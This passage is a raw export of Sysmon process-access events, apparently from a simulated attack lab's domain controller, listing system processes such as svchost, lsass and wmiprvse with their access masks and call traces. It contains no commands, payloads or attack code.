13:58:15.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.258{59A5CD1D-93F6-6005-E604-00000000A301}48883944C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\winsrv.DLL+1ef0|C:\Windows\system32\winsrv.DLL+17e9|C:\Windows\system32\winsrv.DLL+1579|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.243{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.243{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.243{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.196{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.196{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.165{59A5CD1D-8E46-6005-1600-00000000A301}15445084C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.133{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.118{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.118{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.118{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2de4|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2dce|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+57a4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C: